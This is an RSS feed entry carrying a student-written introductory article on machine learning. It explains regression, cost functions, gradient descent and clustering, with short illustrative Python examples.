<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>data science Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/tag/data-science/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/tag/data-science/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Wed, 04 May 2022 14:45:51 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>data science Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/tag/data-science/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>The Theory and Implementation of Common Machine Learning Algorithms</title>
		<link>https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=the-theory-and-implementation-of-common-machine-learning-algorithms</link>
		
		<dc:creator><![CDATA[Amanbir Behniwal]]></dc:creator>
		<pubDate>Mon, 02 May 2022 14:53:58 +0000</pubDate>
				<category><![CDATA[Engineering]]></category>
		<category><![CDATA[Mathematics]]></category>
		<category><![CDATA[algorithms]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[machine learning]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1815</guid>

					<description><![CDATA[<p>Amanbir Behniwal<br />
Vincent Massey Secondary School</p>
<p>The post <a href="https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/">The Theory and Implementation of Common Machine Learning Algorithms</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Amanbir Behniwal</strong><br><strong>Mentor</strong>: Dr. Gino Del Ferraro<br><em>Vincent Massey Secondary School</em></p>
</div></div>






<h2 class="wp-block-heading">1. Introduction</h2>



<p>Machine learning jobs are becoming some of the most in-demand jobs in the world. The idea of machine learning first began to take shape in the 1940s: the goal was something that would emulate human thinking and learning. Machine learning has since become a big part of our daily lives. For example, speech recognition software maps the tones and nuances of someone’s speech to words, and related software can even match a voice to a specific person. Another example is a translator, which tries to understand people speaking a language, accents included, and then translates what they say into another language. Many applications that we use today, such as Alexa, Siri, and Google Translate, use machine learning algorithms. Machine learning is also being integrated into our vehicles: cars such as Teslas use machine learning to help them drive themselves in traffic and detect danger. The future holds many possibilities thanks to machine learning.</p>



<p>In theory, we feed large amounts of data into a machine learning program, which uses statistics to find patterns in the data and then applies those patterns to categorize new data or predict outcomes. We can further divide the algorithms used in machine learning into supervised learning, unsupervised learning, and reinforcement learning. Supervised learning includes regression and classification, while unsupervised learning includes clustering and association.</p>



<p>In this report, we will first discuss the terminology needed to understand its contents. We will then discuss the theory behind some machine learning algorithms. The algorithms implemented in this report are all regression algorithms; however, we will also discuss the theory behind other algorithms. Finally, we will see how to implement the code. GitHub links to the actual code are provided.</p>



<h2 class="wp-block-heading">2. Terminology</h2>



<p>Before we can get started with all the theory, we must develop an understanding of some key terminology that we will use quite often when working with machine learning programs. These are some basic terms that we should be familiar with:</p>



<h4 class="wp-block-heading">2.1 Features</h4>



<p>When we are trying to extrapolate from data using a linear model such as a line of best fit, we want the model’s equation to fit the data as well as possible. In general, a linear model has the equation <em>h</em> = <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub><em>x</em><sub>1</sub> + <em>θ</em><sub>2</sub><em>x</em><sub>2</sub> + · · · + <em>θ<sub>n</sub></em><em>x<sub>n</sub></em>. Here we call <em>x</em><sub>1</sub>, <em>x</em><sub>2</sub>, …, <em>x</em><sub><em>n</em>−1</sub>, <em>x<sub>n</sub></em> the features. We will go into more depth about this later in the report.</p>
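

<p>To make the notation concrete, the short Python sketch below evaluates <em>h</em> for a given set of parameters <em>θ</em> and feature values <em>x</em>. The function name <code>hypothesis</code> and the numbers are illustrative only; they are not taken from the report’s GitHub code.</p>

```python
def hypothesis(theta, features):
    """Evaluate h = theta_0 + theta_1*x_1 + ... + theta_n*x_n.

    theta holds n + 1 parameters (theta[0] is the intercept);
    features holds the n feature values x_1, ..., x_n.
    """
    if len(theta) != len(features) + 1:
        raise ValueError("theta needs exactly one more entry than features")
    return theta[0] + sum(t * x for t, x in zip(theta[1:], features))


# Two features, x_1 = 3 and x_2 = 5, with theta = (1, 2, 0.5):
print(hypothesis([1.0, 2.0, 0.5], [3.0, 5.0]))  # 1 + 2*3 + 0.5*5 = 9.5
```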



<h4 class="wp-block-heading"><strong>2.2 Inputs</strong></h4>



<p>When we run a Python program, we must somehow store the data so that the program knows what we want it to work with. We then take ‘input’ of the data in a form that is convenient to work with. For example, let’s say we had a document that contained a few coordinates. We may want our program to take input of this data so that the x-coordinates and y-coordinates are stored separately. The code written to complete this process is said to be ‘taking input’. This process is explained in greater detail in the code.</p>
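

<p>As a minimal sketch of taking input, the Python function below reads text with one comma-separated point per line (an assumed format; the report’s own data files may be laid out differently) and stores the x-coordinates and y-coordinates in separate lists. The name <code>read_coordinates</code> and the file name <code>points.txt</code> are hypothetical, and <code>io.StringIO</code> stands in for a real file so the example runs on its own.</p>

```python
import io


def read_coordinates(file_obj):
    """Read lines of the form 'x,y' and return the x- and y-values as two lists."""
    xs, ys = [], []
    for line in file_obj:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        x_text, y_text = line.split(",")
        xs.append(float(x_text))
        ys.append(float(y_text))
    return xs, ys


# io.StringIO stands in for an opened file, e.g. open("points.txt")
sample = io.StringIO("1,2\n2,4.5\n3,5.9\n")
xs, ys = read_coordinates(sample)
print(xs)  # [1.0, 2.0, 3.0]
print(ys)  # [2.0, 4.5, 5.9]
```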



<h4 class="wp-block-heading">2.3 <strong>Outputs</strong></h4>



<p>After our code has calculated what we wanted it to, we want to see this information in an organized manner so that we can study it. We then make our program ‘output’ this information. Outputs can consist of words, integers, etc.</p>



<h4 class="wp-block-heading">2.4 <strong>Predicted Values</strong></h4>



<p>Let us say that we took input of many coordinates and we want our program to calculate the line of best fit. When we test different equations to see how well they fit the data, we plug in the same x-coordinates as those in our input data. However, the y-coordinates we get may not be exactly the same as those of the input data. We call these y-coordinates predicted values, since they are where our program predicts each point lies, based on the equation it is testing.</p>



<h4 class="wp-block-heading"><strong>2.5 Expected Values</strong></h4>



<p>The y-values from the input data are our expected values, since they are the original values to which we compare the predicted values.</p>
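

<p>The difference between predicted and expected values can be seen in a few lines of Python. In this illustrative sketch, the data points and the candidate line <em>y</em> = 2<em>x</em> are made up; the program plugs the input x-coordinates into the line and compares the resulting predicted values with the expected ones.</p>

```python
def predict(slope, intercept, xs):
    """Return the predicted y-values of the line y = intercept + slope * x."""
    return [intercept + slope * x for x in xs]


xs = [1.0, 2.0, 3.0]               # x-coordinates from the input data
expected = [2.0, 4.5, 5.9]         # y-coordinates from the input data (expected values)
predicted = predict(2.0, 0.0, xs)  # candidate line y = 2x

for x, y_hat, y in zip(xs, predicted, expected):
    print(f"x = {x}: predicted {y_hat}, expected {y}, difference {y_hat - y:.1f}")
```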



<h2 class="wp-block-heading">3. <strong>Supervised Learning</strong></h2>



<p>Supervised learning is the most commonly used type of machine learning, and it is also the simplest to implement. When using supervised learning, we train the algorithm on example inputs paired with their correct outputs (labels). In this stage, the program is trained to look for patterns that relate the input to the output. Once we have provided the algorithm with enough example pairs, it can apply these patterns to new inputs it receives. We can further split supervised learning into classification and regression.</p>



<h4 class="wp-block-heading">3.1 <strong>Classification</strong></h4>



<p>Classification is a type of supervised learning. In classification, our output is always a category that the algorithm has mapped the input to. An example of this would be our program receiving pictures of animals as input and then outputting what animal each one is (its category). We first have to train the program by inputting many pictures of dogs and cats labelled with their respective categories, so that the program can establish patterns that distinguish the images of dogs from the images of cats. After we have inputted a sufficient number of images, the program becomes accurate at determining whether an animal is a cat or a dog, even for an image it has not seen before.</p>



<h4 class="wp-block-heading">3.2 Regression</h4>



<p>Regression is another type of supervised learning. In regression, our output is not a category but rather a numerical value, such as an amount of money or an age. Take, for example, the prices of houses and their total square footage. Using regression, we find the function that best fits the relationship between these values, reducing the error as much as we can. We can then use the equation of this line to predict how much a house with a certain square footage will cost.</p>



<figure class="wp-block-image size-full is-resized"><img fetchpriority="high" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-1.png" alt="" class="wp-image-1846" width="416" height="183" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-1.png 792w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-300x132.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-768x337.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-350x154.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-480x211.png 480w" sizes="(max-width: 416px) 100vw, 416px" /><figcaption><br>Figure 1: https://medium.com/machine-learning-in-practice/a-gentle-introduction-to-machine-learning-concepts-cfe710910eb</figcaption></figure>



<h5 class="wp-block-heading">3.2.1 Linear Regression</h5>



<p>When performing linear regression, the program takes input of data and plots it on a graph. It then finds a line of best fit and can make predictions based on this line. For example, we can graph the number of hours a student spends watching TV instead of studying against their test score.</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-2.png" alt="" class="wp-image-1847" width="274" height="267" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-2.png 542w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-300x292.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-230x224.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-350x341.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-480x468.png 480w" sizes="(max-width: 274px) 100vw, 274px" /><figcaption><br>Figure 2: onlinemath4all.com/scatter-plots-and-trend-lines.html</figcaption></figure>



<p>As we can see, the graph looks fairly linear, and it has only one feature: the amount of time spent watching TV instead of studying. This makes it a good candidate for linear regression. We want our program to come up with an approximate equation with which we can estimate a student’s test score based on how long they spent watching TV instead of studying. In other words, we want our program to find the line of best fit, since this line is best for extrapolating from the data and gives as accurate an estimate as possible of a test score from the number of hours spent watching TV. Our program would then test many different lines until it finds the one that fits the data better than any other.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-3.png" alt="" class="wp-image-1848" width="365" height="345" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-3.png 542w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-300x283.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-230x217.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-350x331.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-480x453.png 480w" sizes="(max-width: 365px) 100vw, 365px" /><figcaption>Figure 3: onlinemath4all.com/scatter-plots-and-trend-lines.html</figcaption></figure>



<p>As we can deduce, the slope and y-intercept determine the equation of the line of best fit. In fact, finding the line of best fit is just a matter of adjusting these two values. Machine learning algorithms rely on such parameters (the y-intercept or bias, the slope, etc.). To find the best model for our data, we keep adjusting these parameters so that our line better fits the data and our predicted values move closer to the expected values. To know how to adjust them, we need a function that measures how much error the current parameters produce. This function is called the cost function.</p>



<h2 class="wp-block-heading">4. <strong>Cost Function</strong></h2>



<p>The cost function measures how much error our model produces compared to the actual data set, and our program tries to make this value as small as possible. When we are doing linear regression, it is very rare to get a data set where the points lie precisely on a line. Therefore, when computing the line of best fit, we want the line with the least possible difference (error) between the actual coordinates and the coordinates our line gives (the predicted values). There are multiple ways of defining the cost function; two examples are explained in the following sections.</p>



<h4 class="wp-block-heading">4.1 <strong>Mean Absolute Error</strong></h4>



<p>To compute the mean absolute error, we take the absolute value of the difference between the predicted y-value and the expected y-value at each data point. The reason for this is that we are adding up the error at every data point, and we want the total to reflect how much error we are actually accumulating.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-4.png" alt="" class="wp-image-1850" width="509" height="280" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-4.png 784w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-300x165.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-768x423.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-230x127.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-350x193.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-480x264.png 480w" sizes="(max-width: 509px) 100vw, 509px" /><figcaption>Figure 4: https://gist.github.com/FisherKK/86f400f6d88facbf5375286db7029ca2</figcaption></figure>



<p>In this graph, the blue points are the original points of the data set, while the orange points are the ‘predicted’ points that our program is currently testing for the line of best fit. As we can see, each <em>d<sub>i</sub></em> represents the amount of ‘error’ our model/line produces for each point in the data set.</p>



<p>However, if some differences are negative (for example, when the predicted point is below the original point), adding them makes our program think it is producing less error than it really is, because positive and negative errors cancel out. To deal with this, we take the absolute value, which is always non-negative, so that our program never adds negative error. The mean absolute error is then defined as</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image.png" alt="" class="wp-image-1875" width="288" height="67" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image.png 468w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-300x69.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-230x53.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-350x81.png 350w" sizes="(max-width: 288px) 100vw, 288px" /></figure>



<p>where <em>m</em> is the number of training examples, <em>ŷ</em><sup>(<em>i</em>)</sup> is the predicted value, <em>y</em><sup>(<em>i</em>)</sup> is the expected value, and <em>i</em> is the index of the data point, since we want to sum the error over all the data points.</p>
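

<p>The formula above is only shown as an image, so the Python sketch below assumes the standard definition that matches the description, MAE = (1/<em>m</em>) Σ |<em>ŷ</em><sup>(<em>i</em>)</sup> − <em>y</em><sup>(<em>i</em>)</sup>|. It also shows why the absolute value matters: with made-up predictions that are too low at one point and too high at another, the plain average of the differences is zero even though the line is wrong at two points.</p>

```python
def mean_absolute_error(predicted, expected):
    """MAE = (1/m) * sum of |y_hat_i - y_i| over the m data points."""
    m = len(expected)
    if m == 0 or len(predicted) != m:
        raise ValueError("need two non-empty lists of the same length")
    return sum(abs(y_hat - y) for y_hat, y in zip(predicted, expected)) / m


predicted = [2.0, 4.0, 6.0]
expected = [3.0, 3.0, 6.0]

# Averaging the raw (signed) differences lets the -1 and +1 errors cancel out.
signed = sum(y_hat - y for y_hat, y in zip(predicted, expected)) / len(expected)
print(signed)                                    # 0.0
print(mean_absolute_error(predicted, expected))  # (1 + 1 + 0) / 3 = 0.666...
```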



<h4 class="wp-block-heading">4.2 <strong>Mean Squared Error</strong></h4>



<p>When we take the mean squared error, instead of taking the absolute value of the difference between the predicted and expected values, we take the square of that difference. In this way, we still don’t add up negative error, since the square of any real number is non-negative. The equation is defined as:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-1.png" alt="" class="wp-image-1877" width="283" height="64" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-1.png 448w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-300x68.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-230x52.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-350x80.png 350w" sizes="(max-width: 283px) 100vw, 283px" /></figure>



<p>With the mean absolute error, each term was the distance between the predicted value and the expected value. With the mean squared error, each term is instead the area of the square whose side length is that distance. All these areas are summed and averaged. Because each error is squared, large errors are penalized much more heavily than small ones.</p>
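

<p>As with the mean absolute error, the formula is only shown as an image. The Python sketch below computes the usual (1/<em>m</em>) Σ (<em>ŷ</em><sup>(<em>i</em>)</sup> − <em>y</em><sup>(<em>i</em>)</sup>)<sup>2</sup>, with an option to divide by 2<em>m</em> instead, a convention many texts use because it cancels the factor of 2 that appears when the cost is differentiated; which scaling the figure uses is an assumption either way. The made-up data includes one larger error to show that squaring penalizes it more.</p>

```python
def mean_squared_error(predicted, expected, half=False):
    """MSE = (1/m) * sum of (y_hat_i - y_i) ** 2 over the m data points.

    With half=True the sum is divided by 2m instead of m.
    """
    m = len(expected)
    if m == 0 or len(predicted) != m:
        raise ValueError("need two non-empty lists of the same length")
    total = sum((y_hat - y) ** 2 for y_hat, y in zip(predicted, expected))
    return total / (2 * m) if half else total / m


predicted = [2.0, 4.0, 6.0]
expected = [3.0, 3.0, 8.0]   # the last point is off by 2, so it contributes 4
print(mean_squared_error(predicted, expected))             # (1 + 1 + 4) / 3 = 2.0
print(mean_squared_error(predicted, expected, half=True))  # 6 / 6 = 1.0
```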



<p>Now that we have discussed how our program calculates the error that our model/line produces, we must find a way to minimize the value our cost function returns. The gradient descent algorithm is one of the most widely used ways of doing so.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-6.png" alt="" class="wp-image-1854" width="395" height="356" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-6.png 568w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-300x270.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-230x207.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-350x315.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-480x433.png 480w" sizes="(max-width: 395px) 100vw, 395px" /><figcaption><br>Figure 5: https://gist.github.com/FisherKK/86f400f6d88facbf5375286db7029ca2</figcaption></figure>



<p>For linear regression models, we assume that our data has a linear relationship and can therefore be modelled by a linear equation as follows:</p>



<p><em>h</em><sub><em>θ</em></sub>(<em>x</em>) = <em>θ</em><sup><em>T</em></sup><em>x</em> = <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub><em>x</em>,</p>



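<p>where <em>θ</em><sub>0</sub> is our bias (y-intercept) and <em>θ</em><sub>1</sub> is our slope; in the vector form <em>θ</em><sup><em>T</em></sup><em>x</em>, the input vector is taken to have a constant first entry <em>x</em><sub>0</sub> = 1 that multiplies <em>θ</em><sub>0</sub>. We then want to change the parameters <em>θ</em><sub>0</sub> and <em>θ</em><sub>1</sub> so that our line better fits the data and the cost function produces less error. In batch gradient descent, we repeatedly update each <em>θ<sub>j</sub></em>, using all the data points at every step, with the following equation:</p>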



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-2.png" alt="" class="wp-image-1878" width="282" height="58" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-2.png 500w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-300x61.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-230x47.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-350x71.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-480x98.png 480w" sizes="(max-width: 282px) 100vw, 282px" /></figure>



<p>Here, <em>θ<sub>j</sub></em> is the parameter we are updating, and again <em>m</em> is the size of the data set (the number of points). Alpha (<em>α</em>) represents the learning rate of our algorithm. If alpha is too large, each update can overshoot the minimum of the cost function, so the program may bounce around or even diverge instead of settling on the line of best fit. However, if alpha is too small, each step makes very little progress and the program will be incredibly slow. It is best to find a good middle ground between these two extremes.</p>
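

<p>The update rule is also only shown as an image. The Python sketch below assumes the common form <em>θ<sub>j</sub></em> := <em>θ<sub>j</sub></em> − <em>α</em> (1/<em>m</em>) Σ (<em>h</em><sub><em>θ</em></sub>(<em>x</em><sup>(<em>i</em>)</sup>) − <em>y</em><sup>(<em>i</em>)</sup>) <em>x</em><sub><em>j</em></sub><sup>(<em>i</em>)</sup>, which follows from a mean-squared-error cost scaled by 1/(2<em>m</em>). The function name, the data, the learning rate, and the iteration count are illustrative choices, not the report’s.</p>

```python
def batch_gradient_descent(xs, ys, alpha=0.05, iterations=5000):
    """Fit h(x) = theta_0 + theta_1 * x by batch gradient descent.

    Assumes the cost J = (1 / (2m)) * sum((h(x_i) - y_i) ** 2), whose partial
    derivatives give the update below. Every iteration uses all m points
    (the whole "batch") and updates both parameters simultaneously.
    """
    m = len(xs)
    theta0, theta1 = 0.0, 0.0
    for _ in range(iterations):
        errors = [theta0 + theta1 * x - y for x, y in zip(xs, ys)]
        grad0 = sum(errors) / m                             # feature x_0 = 1
        grad1 = sum(e * x for e, x in zip(errors, xs)) / m  # feature x_1 = x
        theta0, theta1 = theta0 - alpha * grad0, theta1 - alpha * grad1
    return theta0, theta1


# Made-up points lying exactly on y = 1 + 2x, so the fit should approach (1, 2).
xs = [0.0, 1.0, 2.0, 3.0, 4.0]
ys = [1.0, 3.0, 5.0, 7.0, 9.0]
theta0, theta1 = batch_gradient_descent(xs, ys)
print(round(theta0, 3), round(theta1, 3))  # 1.0 2.0
```

<p>With these points, raising <code>alpha</code> to a much larger value such as 0.5 makes each step overshoot, and the parameters grow without bound instead of converging, which is the trade-off described above.</p>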



<h2 class="wp-block-heading">6. <strong>Multi-Linear Regression</strong></h2>



<p>Now that we have discussed how to optimize our program so that it can calculate the line of best fit with equation <em>h</em> = <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub><em>x</em><sub>1</sub>, let us consider what to do when we have multiple features. So far we have worked with only one feature, which in the example presented was the number of hours spent watching TV instead of studying. Let’s take another example: the price of a house. To determine the price of a house, we must consider its area, how many rooms it has, and how old it is, among other things. The relationship may still be linear, but we cannot use exactly the same technique as single-feature linear regression, since we have more than one feature. We use multi-linear regression in this situation because it can handle more than one feature.</p>



<p>Multi-linear regression can be used with as many features as we’d like. Our equation is now</p>



<p><em>h</em> = <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub> · <em>x</em><sub>1</sub> + <em>θ</em><sub>2</sub> · <em>x</em><sub>2</sub> + · · · + <em>θ<sub>n</sub></em> · <em>x<sub>n</sub></em>,</p>



<p>where each <em>x<sub>i</sub></em> represents a different feature. When we now implement gradient descent, we must use it to update every <em>θ<sub>i</sub></em> so that our model better fits the data. The cost function can be implemented in much the same way.</p>



<p>An interesting thing to note about multi-linear regression is that with <em>n</em> features we would need an (<em>n</em> + 1)-dimensional graph to plot all the points (one axis per feature plus one for the output). For example, with two features we can use a 3-D graph, and our program is essentially finding the plane of best fit through all the points.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-7-1024x312.png" alt="" class="wp-image-1858" width="536" height="162" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-1024x312.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-300x91.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-768x234.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-920x280.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-480x146.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7.png 1208w" sizes="(max-width: 536px) 100vw, 536px" /><figcaption>&nbsp; &nbsp; &nbsp; Figure 6: https://aegis4048.github.io/mutiple linear regression and visualization in python</figcaption></figure>
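

<p>Extending gradient descent to several features, the Python sketch below updates every <em>θ<sub>i</sub></em> at once using all the data points. The function name and the noise-free data are made up for illustration, and the code is written in plain Python for readability; a practical implementation would more likely use vectorized NumPy operations.</p>

```python
def fit_multilinear(rows, ys, alpha=0.1, iterations=5000):
    """Batch gradient descent for h = theta_0 + theta_1*x_1 + ... + theta_n*x_n.

    rows holds one list of n feature values per data point. Every theta_j is
    updated simultaneously on each iteration, using all m data points.
    """
    m, n = len(rows), len(rows[0])
    theta = [0.0] * (n + 1)
    for _ in range(iterations):
        errors = [theta[0] + sum(t * x for t, x in zip(theta[1:], row)) - y
                  for row, y in zip(rows, ys)]
        gradient = [sum(errors) / m]  # theta_0 multiplies a constant feature x_0 = 1
        for j in range(n):
            gradient.append(sum(e * row[j] for e, row in zip(errors, rows)) / m)
        theta = [t - alpha * g for t, g in zip(theta, gradient)]
    return theta


# Made-up, noise-free data generated from h = 1 + 2*x_1 + 3*x_2.
rows = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0], [2.0, 1.0], [1.0, 2.0]]
ys = [1.0 + 2.0 * x1 + 3.0 * x2 for x1, x2 in rows]
theta = fit_multilinear(rows, ys)
print([round(t, 3) for t in theta])  # [1.0, 2.0, 3.0]
```

<p>When the features have very different scales (for example, area in square feet next to the number of rooms), gradient descent may need a smaller <code>alpha</code> or rescaled features to converge.</p>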



<h2 class="wp-block-heading">7. <strong>Unsupervised Learning</strong></h2>



<p>Unlike supervised learning, unsupervised learning does not train the program with inputs and corresponding outputs. Rather, the program uses its built-in algorithms to find patterns in unlabelled data and produce an output. For example, if we input shapes of different sizes, the algorithm could group them by how many sides each shape has. In general, unsupervised learning does not require the data to be labelled, unlike supervised learning. We can further split unsupervised learning into clustering and association.</p>



<h4 class="wp-block-heading">7.1 <strong>Clustering</strong></h4>



<p>As discussed earlier, in unsupervised learning, we input unlabelled data into our program. Graphing our data, it may look like the following:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-8.png" alt="" class="wp-image-1859" width="440" height="368" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-8.png 784w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-300x251.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-768x643.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-230x192.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-350x293.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-480x402.png 480w" sizes="(max-width: 440px) 100vw, 440px" /><figcaption><br>Figure 7: <a href="http://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/">https://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/</a></figcaption></figure>



<p>Once our program has graphed the data, we want it to find patterns in the data. Specifically, clustering algorithms look for groups of points that lie close together. The graph could then be divided into the following clusters:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="688" height="608" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-9.png" alt="" class="wp-image-1860" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-9.png 688w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-300x265.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-230x203.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-350x309.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-480x424.png 480w" sizes="(max-width: 688px) 100vw, 688px" /><figcaption>Figure 8: &nbsp; https://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/</figcaption></figure>
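

<p>Figures 7 and 8 come from a tutorial on k-means clustering, one widely used clustering algorithm, although the report itself does not commit to a specific method. As an illustration only, here is a minimal pure-Python sketch of k-means (Lloyd’s algorithm) on made-up 2-D points. The number of clusters <em>k</em> has to be chosen in advance, and <code>math.dist</code> requires Python 3.8 or later.</p>

```python
import math
import random


def k_means(points, k, max_iterations=100, seed=0):
    """Group 2-D points into k clusters using Lloyd's k-means algorithm.

    Returns the final centroids and the list of points in each cluster.
    """
    rng = random.Random(seed)
    centroids = rng.sample(points, k)  # start from k randomly chosen data points
    for _ in range(max_iterations):
        # Assignment step: each point joins the cluster of its nearest centroid.
        clusters = [[] for _ in range(k)]
        for p in points:
            nearest = min(range(k), key=lambda c: math.dist(p, centroids[c]))
            clusters[nearest].append(p)
        # Update step: move each centroid to the mean of the points assigned to it.
        new_centroids = [
            tuple(sum(coords) / len(members) for coords in zip(*members)) if members
            else centroids[c]  # an empty cluster keeps its old centroid
            for c, members in enumerate(clusters)
        ]
        if new_centroids == centroids:
            break  # nothing moved, so the clusters are stable
        centroids = new_centroids
    return centroids, clusters


points = [(1.0, 1.0), (1.5, 2.0), (1.0, 1.5), (8.0, 8.0), (8.5, 9.0), (9.0, 8.0)]
centroids, clusters = k_means(points, k=2)
for centroid, members in zip(centroids, clusters):
    print(centroid, members)
```

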